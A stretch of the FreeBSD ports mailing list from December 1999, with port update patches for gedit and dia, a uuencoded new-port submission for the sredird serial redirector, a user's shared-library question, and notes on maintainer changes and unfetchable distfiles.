15602 >Category: ports >Synopsis: Update port: editors/gedit >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 00:30:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andrey Zakhvatov >Release: FreeBSD 3.3-RELEASE i386 >Organization: South Ural Railway ICC >Environment: >Description: This is a patch to update editors/gedit port. diff -Nru gedit/Makefile gedit-0.6.1/Makefile --- gedit/Makefile Sun Nov 21 14:17:38 1999 +++ gedit-0.6.1/Makefile Thu Dec 16 11:00:26 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: gedit -# Version required: 0.6.0 +# Version required: 0.6.1 # Date created: 4 May 1999 # Whom: Andrey Zakhvatov # # $FreeBSD: ports/editors/gedit/Makefile,v 1.10 1999/11/21 00:41:55 cpiazza Exp $ # -DISTNAME= gedit-0.6.0 +DISTNAME= gedit-0.6.1 CATEGORIES= editors gnome MASTER_SITES= http://www.oscentral.org/files/software/ \ http://gedit.pn.org/tar/ \ diff -Nru gedit/files/md5 gedit-0.6.1/files/md5 --- gedit/files/md5 Sun Nov 21 14:17:38 1999 +++ gedit-0.6.1/files/md5 Thu Dec 16 11:00:38 1999 @@ -1 +1 @@ -MD5 (gedit-0.6.0.tar.gz) = 658a120a6edc0443436716fb648568a6 +MD5 (gedit-0.6.1.tar.gz) = 8d7105ad9d2164cb69ca85b567589717 >How-To-Repeat: >Fix: Please, check and apply this patch. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 1:20: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 359051502D for ; Tue, 21 Dec 1999 01:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA31146; Tue, 21 Dec 1999 01:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id B399C14C0E; Tue, 21 Dec 1999 01:17:46 -0800 (PST) Message-Id: <19991221091746.B399C14C0E@hub.freebsd.org> Date: Tue, 21 Dec 1999 01:17:46 -0800 (PST) From: sobomax@altavista.net To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15603: [NEW PORT] new port of sredird - a RFC 2217 compliant serial port redirector Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15603 >Category: ports >Synopsis: [NEW PORT] new port of sredird - a RFC 2217 compliant serial port redirector >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 01:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Maxim Sobolev >Release: 4.0-CURRENT, 3.4-STABLE >Organization: Vega International Capital >Environment: >Description: New port of sredird - a first (AFAIK) GPL'ed RFC 2217 compliant serial port redirector. Allows to share modems and other serial devices across network. >How-To-Repeat: >Fix: begin 644 sredird.tar.gz M'XL(`$U$7S@``^U9^U/;N!;NK_BO.$,[>V$A?N5%TFT'&D(GTR0P2;J]]R=& ML95$@VUE;9F0W>%_OT>R31[0TMDMV;E[]0TDL70>TCEZ?):2F/HL]JU7+PBH MV/5J%5Z!A+WUG3]`W7;KM8I3K[@`CEUS:Z^@^I*-*I`F@L0`KV+.Q;?D%C-* M@UTT:+=(\OQ/6$"3%QH%WYW_2MVI5\N8?Z=>+NO\[P*;^0_]EXBY8]NU2N4; M^:_7BOR[MBWS[Y;K]BNP7Z`MC_!_GO_>>14.\D%0&==NK^9_N6S+^>_J M^;\;#+/\`TN`?&7F@Y@1(0562\2"B1D64RB6#V-_1(.("FCQ$*ZD?HM'(N8! M7,X%X]$^S&,NN,<#$T8SM%4\0D!%`DN>0C(C,34V&R%F,4^GF2NTON#QC=2G MP*-@"3<17T0/30"R0`/@!8Q&PD`7YVCF,A56YPI^=8]A,6/>+.OG%Q;Y?)%` MHVHU3JS^*%21(^$1( MKR:&QH2S:,DC"BP2-*:)H!C5R%C$3+!HBEXS)T`B']O"(21+[!,*S6@P?QS1 M580\G@:^X6$\T2N05,RPE7P"^=0UH;/9UE5`T),TF:?FJC`H@T-N"0O(.*!% MEQ@5$Y/'4],P2M`C=RR$(1_S@-X:"7Z'Y.Z4!(+<,IPO)IK3^\$_`NOK_U6W M,_SQ[.]Y_N>4*P7_K[F2"^+[O^WJ]7\7"-B8WE'/RL>!H59AR^ M:S]1T;J\^D^G_]$XQ:H7X'T"1S!ZYH?(,\"5\/,?_W'*M./]W[>S] MKURMZ_F_"[R&/ETHLB7Y71`@XY,T(LR'`R"S:.X5$_HU_$KC1-;']+<4Z:'? MW%-GAEAS3@22KYCB%Y;N.0TXIQXXC48#*[_,>(B%&[0"?GF25[PW7J/"FXN8 MT@_#\V;6-`OY59A8VX,5VG=S>(,*QCGN7/VS7OO=WL99IM$Z&[4_7@XZ[>&[ M/67#Z)T-1^W!];`SDF4S(>9-RPJI(,B&S#3R3.JGUCP=6UT6I7=6LD0B%UH9 M*;4,5._T1_C?'J"K)WF1X?/2.&6!WS3VWOS1:MT#?EYTSSX.[Z$TA=(7$@10 MXECZ9?!I.&C=%]UZ7&)ZRAJ+T'80*'N]3^>=@31Y-6A?=/Z-HH^6793J](>C MLV[W^FIP^7%PUKM_TEEA(=\"UO5Z9_UUG6P+^%ZG6\KY-O%-;<-DD1>D/H5? MQHEORIR;X[(5N`+___K>,6T`]>__7][\[P7;^U7>)D!_I MXYG]O^S:]8?[?Y25+P3UBJ/W_UV@5"H]'"1X^/[/IGL]W-^'=`ZN#4ZUZ=:: MU4JVCQ\=':UD]T8I55N\ZX#C-&VW63G)Q$Y/H50I']?A"#\=%TY/#7C]L+Y/ MO$@$YNS]>AENL@&?;A4*&H>,)[*TM%TJ"X]>LTGDTPE<7^=DX?H:K)\A?X"? M+2GR2$^*G'.:1/\20.]PUY9')ALZ-$CHNBINZOXXU^Q3CR8)B9>2&,&4"G5* M,UY&)*0'Y4.8((-0!&K3.YI@^&^QZ%H2BC"W-J"_21*E;#V(S,U9WH[(9Y.M M'FT&S4JX=T/%5N!6SKY6,9<5,DV.VSBNP1&^@!\[%94H&1TZ(6D@(.0^Q=:!TF`QCDL=Q\DR>$Q&GG@`1)A`N\?,M*N6> M!0MIYK]_4B*'TD:+_[XAX'%,1QK.DT>#(KCUI7VYG?Q[+] MP]+[^;4JE:8+27D()W]WKB"-,BO^(Y.=QQ8[&P9!FEQKTV-\=<@^OE<3M)Y=FZ-8RR!]X#6/JF>;;JOU.R3I]UG-;E[%O"TX:SV*K@V\0-1*AC;QR[Y1/LT/[Z2%AKE:I\JXG^WX6O\+_QC_3QW/G/P_GO`_^7 MWYK_[0*2_V6O]QGY6V=U=K/2:);+*_*7"6[)5/&OL6)^)[9D?NI3KGQK]XL^ M3=A4[GZX)L1II+;#&"0C\<'+;@M-4+=[`5/7:.KR2M4;4F#"IFF5!7V#RXG\KHPEGOW M?J:^O\;,"OJ1AS:A\2U#/KL93B.+9U%Y#*H<;DF`:[ND@[C)$I'=S]9MVSY4 M%&=_%8;"HU[4-30T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#1V@/\" (I$%!6@!0``#4 ` end >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 1:22:42 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mailsorter-105-1.iap.bryant.webtv.net (mailsorter-105-1.iap.bryant.webtv.net [209.240.198.119]) by hub.freebsd.org (Postfix) with ESMTP id A24A415063 for ; Tue, 21 Dec 1999 01:22:40 -0800 (PST) (envelope-from SHAHRAM@webtv.net) Received: from storefull-117.iap.bryant.webtv.net (storefull-117.iap.bryant.webtv.net [209.240.198.197]) by mailsorter-105-1.iap.bryant.webtv.net (WebTV_Postfix) with ESMTP id 41C981F51 for ; Tue, 21 Dec 1999 01:22:40 -0800 (PST) Received: (from production@localhost) by storefull-117.iap.bryant.webtv.net (8.8.8-wtv-e/mt.gso.26Feb98) id BAA28845; Tue, 21 Dec 1999 01:22:40 -0800 (PST) From: SHAHRAM@webtv.net X-WebTV-Signature: 1 ETAsAhQGJjl6XcTdJw/3D+l3t4p0hwb3tgIUHo/AJ2S5fndyDMfCvjgHZRev6Bk= Date: Tue, 21 Dec 1999 04:22:39 -0500 (EST) To: ports@FreeBSD.org Subject: giflib-4.1.0 Message-ID: <368-385F46DF-21785@storefull-117.iap.bryant.webtv.net> Content-Disposition: Inline Content-Type: Text/Plain; Charset=US-ASCII Content-Transfer-Encoding: 7Bit MIME-Version: 1.0 (WebTV) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, I'm trying to install this application on my HOME directrory. I did download and unpack the package on the server. gunzip ......tgz tar -xvf ......tar But I'm getting this error when trying to run giflib. /usr/libexec/ld-elf.so.1: Shared object "libgif.so.5" not found The package is placed on : /home/userName/public_html/directory/ ( Apache 1.2.6 FreeBSD 3.0-RELEASE #4: ) In perl we have : use lib 'directory'; to ran modules that are not install on the server off home directory. Is there any thing I can do to get this application working. ( file "libgif.so.5" did come with the package ) Tank you for your time. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 5: 0: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7B163153E9 for ; Tue, 21 Dec 1999 05:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA52674; Tue, 21 Dec 1999 05:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from midget.dons.net.au (daniel.lnk.telstra.net [139.130.137.70]) by hub.freebsd.org (Postfix) with ESMTP id 53A3214DF8 for ; Tue, 21 Dec 1999 04:51:54 -0800 (PST) (envelope-from darius@guppy.dons.net.au) Received: from guppy.dons.net.au (guppy.dons.net.au [203.31.81.9]) by midget.dons.net.au (8.9.3/8.9.1) with ESMTP id XAA32275 for ; Tue, 21 Dec 1999 23:21:41 +1030 (CST) (envelope-from darius@guppy.dons.net.au) Received: (from darius@localhost) by guppy.dons.net.au (8.9.3/8.9.3) id XAA19504; Tue, 21 Dec 1999 23:20:32 +1030 (CST) (envelope-from darius) Message-Id: <199912211250.XAA19504@guppy.dons.net.au> Date: Tue, 21 Dec 1999 23:20:32 +1030 (CST) From: "Daniel O'Connor" Reply-To: darius@dons.net.au To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15605: Update of the tclreadline port to 1.0.3 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15605 >Category: ports >Synopsis: Update of the tclreadline port to 1.0.3 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 05:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Daniel J. O'Connor >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: >Description: Update the devel/tclreadline port to version 1.0.3 >How-To-Repeat: >Fix: Unified diff is here.. http://www.dons.net.au/~darius/tclreadline-1.0.3-diff >Release-Note: >Audit-Trail: >Unformatted: Daniel O'Connor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 5: 6:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EEA1714A2B; Tue, 21 Dec 1999 05:06:19 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA53256; Tue, 21 Dec 1999 05:06:18 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Tue, 21 Dec 1999 05:06:18 -0800 (PST) From: Message-Id: <199912211306.FAA53256@freefall.freebsd.org> To: beaupran@iro.umontreal.ca, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15578: Amanda 2.3.0 runtar program allow any user to run tar as root Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Amanda 2.3.0 runtar program allow any user to run tar as root State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Tue Dec 21 05:05:46 PST 1999 State-Changed-Why: Duplicate of ports/15577. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 6:56:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 75D6F14E94; Tue, 21 Dec 1999 06:56:50 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA18839; Tue, 21 Dec 1999 06:56:50 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 21 Dec 1999 06:56:50 -0800 (PST) From: Message-Id: <199912211456.GAA18839@freefall.freebsd.org> To: sheldonh@FreeBSD.org, jraynard@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/14833: update port: sfio Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update port: sfio Responsible-Changed-From-To: jraynard->freebsd-ports Responsible-Changed-By: sheldonh Responsible-Changed-When: Tue Dec 21 06:55:59 PST 1999 Responsible-Changed-Why: James has retired from active service. Whoever takes this one might want to look for a new maintainer for the port as well. Perhaps the Originator of this PR will be keen? :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 7:16:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 9A63214E67 for ; Tue, 21 Dec 1999 07:16:14 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.11 #1) id 120R1m-0004SU-00 for ports@FreeBSD.org; Tue, 21 Dec 1999 17:16:42 +0200 From: Sheldon Hearn Reply-To: ports@FreeBSD.org To: ports@FreeBSD.org Subject: James Raynard's ports need new maintainers Date: Tue, 21 Dec 1999 17:16:42 +0200 Message-ID: <17141.945789402@axl.noc.iafrica.com> Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi folks, Recently, one of the FreeBSD committers let us know that his time available is such that he doesn't have time to help out with the project any more. This means that, when the ports freeze is over, the following ports will need new maintainers: devel/ElectricFence devel/sfio editors/textedit emulators/sim lang/smalltalk news/slurp x11/props Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 8:52:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.146]) by hub.freebsd.org (Postfix) with ESMTP id ECCF414F28; Tue, 21 Dec 1999 08:52:35 -0800 (PST) (envelope-from trevor@jpj.net) Received: from localhost (trevor@localhost) by blues.jpj.net (right/backatcha) with ESMTP id LAA17095; Tue, 21 Dec 1999 11:52:30 -0500 (EST) Date: Tue, 21 Dec 1999 11:52:30 -0500 (EST) From: Trevor Johnson To: sheldonh@FreeBSD.ORG Cc: jraynard@FreeBSD.ORG, freebsd-ports@FreeBSD.ORG Subject: Re: ports/14833: update port: sfio In-Reply-To: <199912211456.GAA18839@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Perhaps the Originator of this PR will be keen? :-) I am not using the port; I just noticed that it needed to be updated. However, if no one who's more familiar with sfio comes forward, I wouldn't mind maintaining the port. __ Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 10: 0:47 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8BB2E155CF for ; Tue, 21 Dec 1999 10:00:37 -0800 (PST) (envelope-from fenner@FreeBSD.org) Received: (from fenner@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA39355 for ports@freebsd.org; Tue, 21 Dec 1999 10:00:37 -0800 (PST) (envelope-from fenner@FreeBSD.org) Date: Tue, 21 Dec 1999 10:00:37 -0800 (PST) From: Message-Id: <199912211800.KAA39355@freefall.freebsd.org> To: ports@freebsd.org Subject: Unfetchable distfiles reminder Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear porters, This is just a reminder to please periodically check the list of unfetchable distfiles at http://www.freebsd.org/~fenner/portsurvey/ . In particular, the list of ports with no MAINTAINER with distfile problems is http://www.freebsd.org/~fenner/portsurvey/ports@freebsd.org.html Since no one is responsible for these ports, the problem won't get fixed unless someone on this list takes the initiative. In addition, the list of all ports with any unfetchable distfile is http://www.freebsd.org/~fenner/portsurvey/bad.html if you don't mind coordinating your fixes with the port MAINTAINER. Thanks for your help! Bill "distfiles" Fenner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Tue Dec 21 13:20:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 774D0154AA for ; Tue, 21 Dec 1999 13:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA57653; Tue, 21 Dec 1999 13:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from tricord.system.pl (tricord.system.pl [195.205.185.10]) by hub.freebsd.org (Postfix) with ESMTP id 7CAD5154AA for ; Tue, 21 Dec 1999 13:11:26 -0800 (PST) (envelope-from saper@saperski.system.pl) Received: from saperski.system.pl (saperski.system.pl [195.205.185.24]) by tricord.system.pl (SYSTEM Internet) with ESMTP id WAA13860; Tue, 21 Dec 1999 22:11:09 +0100 (MET) Received: (from saper@localhost) by saperski.system.pl (8.9.3/8.9.3) id WAA31481; Tue, 21 Dec 1999 22:12:02 +0100 (CET) (envelope-from saper) Message-Id: <199912212112.WAA31481@saperski.system.pl> Date: Tue, 21 Dec 1999 22:12:02 +0100 (CET) From: saper@system.pl Reply-To: saper@system.pl To: FreeBSD-gnats-submit@freebsd.org Cc: saper@system.pl X-Send-Pr-Version: 3.2 Subject: ports/15613: Update dia port to 0.82 [PATCH] Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15613 >Category: ports >Synopsis: Update dia port to 0.82 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 13:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Marcin Cie¶lak >Release: FreeBSD 3.4-RC i386 >Organization: SYSTEM Internet Provider >Environment: FreeBSD saperski.system.pl 3.4-RC FreeBSD 3.4-RC #5: Thu Dec 16 19:52:18 CET 1999 root@saperski.system.pl:/usr/src/sys/compile/SAPERSKI i386 Current ports tree >Description: New version of dia released, maintainer of original source changed, distfile moved to GNOME master sites. >How-To-Repeat: >Fix: Index: Makefile =================================================================== RCS file: /home/ncvs/ports/graphics/dia/Makefile,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 Makefile --- Makefile 1999/11/25 14:52:50 1.1.1.1 +++ Makefile 1999/12/21 18:23:58 @@ -1,14 +1,15 @@ # New ports collection makefile for: dia -# Version required: 0.81 -# Date created: 2 November 1999 +# Version required: 0.82 +# Date created: 21 December 1999 # Whom: saper@system.pl # # $FreeBSD: ports/graphics/dia/Makefile,v 1.1.1.1 1999/11/25 14:52:50 nakai Exp $ # -DISTNAME= dia-0.81 +DISTNAME= dia-0.82 CATEGORIES= graphics -MASTER_SITES= http://www.lysator.liu.se/~alla/dia/files/ +MASTER_SITES= ${MASTER_GNOME_SITES} +MASTER_SITES_SUBDIR= stable/sources/dia MAINTAINER= saper@system.pl Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/graphics/dia/files/md5,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 md5 --- md5 1999/11/25 14:52:50 1.1.1.1 +++ md5 1999/12/21 18:24:12 @@ -1 +1 @@ -MD5 (dia-0.81.tar.gz) = 181d294cbe3a578476f40fd15498568d +MD5 (dia-0.82.tar.gz) = d14e32554f62041fe5a24b13695e8573 Index: patches/patch-aa =================================================================== RCS file: /home/ncvs/ports/graphics/dia/patches/patch-aa,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 patch-aa --- patch-aa 1999/11/25 14:52:50 1.1.1.1 +++ patch-aa 1999/12/21 20:13:00 @@ -1,11 +1,24 @@ ---- Makefile.am.orig Tue Nov 2 12:37:47 1999 -+++ Makefile.am Tue Nov 2 12:38:02 1999 -@@ -5,7 +5,7 @@ +--- Makefile.am.orig Tue Dec 21 21:11:05 1999 ++++ Makefile.am Tue Dec 21 21:12:45 1999 +@@ -5,17 +5,18 @@ pkgdata_DATA = dia_logo.png man_MANS = dia.1 -pixmapdir = $(datadir)/pixmaps -+pixmapdir = $(datadir)/gnome/pixmaps - pixmap_DATA = dia_gnome_icon.png ++gnomedatadir = $(datadir)/gnome ++pixmapdir = $(gnomedatadir)/pixmaps + pixmap_DATA = dia_gnome_icon.png dia-diagram.png - Applicationsdir = $(datadir)/gnome/apps/Applications +-Applicationsdir = $(datadir)/gnome/apps/Applications ++Applicationsdir = $(gnomedatadir)/apps/Applications + Applications_DATA = dia.desktop + + dia.keys: $(srcdir)/dia.keys.in Makefile + sed -e 's^\@icondir\@^$(pixmapdir)^g' $(srcdir)/dia.keys.in > dia.keys.tmp \ + && mv dia.keys.tmp dia.keys + +-mimedir = $(datadir)/mime-info ++mimedir = $(gnomedatadir)/mime-info + mime_DATA = dia.mime dia.keys + + EXTRA_DIST = dia.xpm dia_gnome_icon.png dia_gnome_menu_icon.png \ Index: patches/patch-ab =================================================================== RCS file: /home/ncvs/ports/graphics/dia/patches/patch-ab,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 patch-ab --- patch-ab 1999/11/25 14:52:50 1.1.1.1 +++ patch-ab 1999/12/21 20:13:15 @@ -1,11 +1,20 @@ ---- Makefile.in.orig Tue Nov 2 13:02:50 1999 -+++ Makefile.in Tue Nov 2 13:03:25 1999 -@@ -115,7 +115,7 @@ +--- Makefile.in.orig Tue Dec 21 21:11:10 1999 ++++ Makefile.in Tue Dec 21 21:12:32 1999 +@@ -114,13 +114,14 @@ pkgdata_DATA = dia_logo.png man_MANS = dia.1 -pixmapdir = $(datadir)/pixmaps -+pixmapdir = $(datadir)/gnome/pixmaps - pixmap_DATA = dia_gnome_icon.png ++gnomedatadir = $(datadir)/gnome ++pixmapdir = $(gnomedatadir)/pixmaps + pixmap_DATA = dia_gnome_icon.png dia-diagram.png - Applicationsdir = $(datadir)/gnome/apps/Applications +-Applicationsdir = $(datadir)/gnome/apps/Applications ++Applicationsdir = $(gnomedatadir)/apps/Applications + Applications_DATA = dia.desktop + +-mimedir = $(datadir)/mime-info ++mimedir = $(gnomedatadir)/mime-info + mime_DATA = dia.mime dia.keys + + EXTRA_DIST = dia.xpm dia_gnome_icon.png dia_gnome_menu_icon.png dia.desktop dia.spec KNOWN_BUGS $(pkgdata_DATA) $(man_MANS) dia-diagram.png dia.mime dia.keys.in diagram.dtd Index: patches/patch-ac =================================================================== RCS file: patch-ac diff -N patch-ac --- /dev/null Tue Dec 21 21:56:57 1999 +++ patch-ac Tue Dec 21 19:37:37 1999 @@ -0,0 +1,101 @@ +--- lib/dia_xml.c Mon Nov 22 01:32:02 1999 ++++ /tmp/dia_xml.c Tue Dec 21 19:35:02 1999 +@@ -31,7 +31,7 @@ + const char *attrname) + { + AttributeNode attr; +- const char *name; ++ char *name; + + attr = obj_node->childs; + while (attr != NULL) { +@@ -53,7 +53,7 @@ + const char *attrname) + { + AttributeNode attr; +- const char *name; ++ char *name; + + attr = composite_node->childs; + while (attr != NULL) { +@@ -132,7 +132,7 @@ + int + data_int(DataNode data) + { +- const char *val; ++ char *val; + int res; + + if (data_type(data)!=DATATYPE_INT) { +@@ -149,7 +149,7 @@ + + int data_enum(DataNode data) + { +- const char *val; ++ char *val; + int res; + + if (data_type(data)!=DATATYPE_ENUM) { +@@ -167,7 +167,7 @@ + real + data_real(DataNode data) + { +- const char *val; ++ char *val; + real res; + + if (data_type(data)!=DATATYPE_REAL) { +@@ -185,7 +185,7 @@ + int + data_boolean(DataNode data) + { +- const char *val; ++ char *val; + int res; + + if (data_type(data)!=DATATYPE_BOOLEAN) { +@@ -219,7 +219,7 @@ + void + data_color(DataNode data, Color *col) + { +- const char *val; ++ char *val; + int r,g,b; + + if (data_type(data)!=DATATYPE_COLOR) { +@@ -248,7 +248,7 @@ + void + data_point(DataNode data, Point *point) + { +- const char *val; ++ char *val; + char *str; + + if (data_type(data)!=DATATYPE_POINT) { +@@ -274,7 +274,7 @@ + void + data_rectangle(DataNode data, Rectangle *rect) + { +- const char *val; ++ char *val; + char *str; + + if (data_type(data)!=DATATYPE_RECTANGLE) { +@@ -325,7 +325,7 @@ + char * + data_string(DataNode data) + { +- const char *val; ++ char *val; + char *str, *p; + int len; + +@@ -394,7 +394,7 @@ + Font * + data_font(DataNode data) + { +- const char *name; ++ char *name; + Font *font; + + if (data_type(data)!=DATATYPE_FONT) { Index: pkg/DESCR =================================================================== RCS file: /home/ncvs/ports/graphics/dia/pkg/DESCR,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 DESCR --- DESCR 1999/11/25 14:52:50 1.1.1.1 +++ DESCR 1999/12/21 21:10:48 @@ -6,6 +6,7 @@ (class diagrams) and network diagrams. It can currently load and save diagrams to a custom fileformat and export to postscript. +Current maintainer: James Henstridge WWW: http://www.lysator.liu.se/~alla/dia/ -- Index: pkg/PLIST =================================================================== RCS file: /home/ncvs/ports/graphics/dia/pkg/PLIST,v retrieving revision 1.2 diff -u -r1.2 PLIST --- PLIST 1999/12/10 19:53:35 1.2 +++ PLIST 1999/12/21 20:40:40 @@ -14,32 +14,10 @@ lib/locale/ja/LC_MESSAGES/dia.mo lib/locale/no/LC_MESSAGES/dia.mo lib/locale/pl/LC_MESSAGES/dia.mo +lib/locale/pt/LC_MESSAGES/dia.mo +lib/locale/ru/LC_MESSAGES/dia.mo lib/locale/sv/LC_MESSAGES/dia.mo share/dia/dia_logo.png -share/dia/shape-internal/flowchart/collate.shape -share/dia/shape-internal/flowchart/delay.shape -share/dia/shape-internal/flowchart/display.shape -share/dia/shape-internal/flowchart/document.shape -share/dia/shape-internal/flowchart/extract.shape -share/dia/shape-internal/flowchart/intstorage.shape -share/dia/shape-internal/flowchart/magdisk.shape -share/dia/shape-internal/flowchart/magdrum.shape -share/dia/shape-internal/flowchart/magtape.shape -share/dia/shape-internal/flowchart/manualinput.shape -share/dia/shape-internal/flowchart/manualop.shape -share/dia/shape-internal/flowchart/merge.shape -share/dia/shape-internal/flowchart/offlinestore.shape -share/dia/shape-internal/flowchart/offpageconn.shape -share/dia/shape-internal/flowchart/or.shape -share/dia/shape-internal/flowchart/predefdproc.shape -share/dia/shape-internal/flowchart/preparation.shape -share/dia/shape-internal/flowchart/punchedcard.shape -share/dia/shape-internal/flowchart/punchedtape.shape -share/dia/shape-internal/flowchart/sort.shape -share/dia/shape-internal/flowchart/sumjunction.shape -share/dia/shape-internal/flowchart/terminal.shape -share/dia/shape-internal/flowchart/transaction.shape -share/dia/shape-internal/flowchart/transmittape.shape share/dia/shapes/Circuit/ground.shape share/dia/shapes/Circuit/ground.xpm share/dia/shapes/Circuit/hcapacitor.shape @@ -52,6 +30,8 @@ share/dia/shapes/Circuit/hinductor.xpm share/dia/shapes/Circuit/hinductor_de.shape share/dia/shapes/Circuit/hinductor_de.xpm +share/dia/shapes/Circuit/hled_de.shape +share/dia/shapes/Circuit/hled_de.xpm share/dia/shapes/Circuit/hpowersource_de.shape share/dia/shapes/Circuit/hpowersource_de.xpm share/dia/shapes/Circuit/hresistor.shape @@ -60,7 +40,6 @@ share/dia/shapes/Circuit/hresistor_de.xpm share/dia/shapes/Circuit/hzener.shape share/dia/shapes/Circuit/hzener.xpm -share/dia/shapes/Circuit/index.sheet share/dia/shapes/Circuit/lamp_de.shape share/dia/shapes/Circuit/lamp_de.xpm share/dia/shapes/Circuit/npn.shape @@ -81,6 +60,8 @@ 